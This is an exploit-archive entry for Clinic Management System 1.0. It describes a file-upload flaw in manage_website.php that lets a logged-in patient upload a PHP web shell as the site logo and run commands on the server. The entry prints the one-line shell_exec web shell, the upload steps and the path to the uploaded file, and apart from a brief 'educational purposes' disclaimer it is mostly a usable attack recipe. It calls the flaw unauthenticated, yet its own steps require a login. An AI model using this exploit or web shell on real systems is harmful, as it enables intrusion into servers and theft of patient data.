Exploits / Vulnerability Discovered : 2020-06-04 |
Type : webapps |
Platform : php
This exploit / vulnerability Clinic management system 1.0 unauthenticated remote code execution is for educational purposes only and if it is used you will do on your own risk!
# Vulnerability:
Clinic Management System version 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution
(RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file.
# vulnerable file : manage_website.php
# Details:
login to website as patient then access the 'localhost/source%20code/manage_website.php' page, as it does not check for an admin user.
change website logo and upload your malicious php file(<?php echo shell_exec($_GET["cmd"]); ?>). if you see this message "Something Went Wrong" You have successfully uploaded the malicious php file.
path of your file: http://localhost/source%20code/uploadImage/Logo/your_file.php
# Proof of Concept:
http://localhost/source%20code/manage_website.php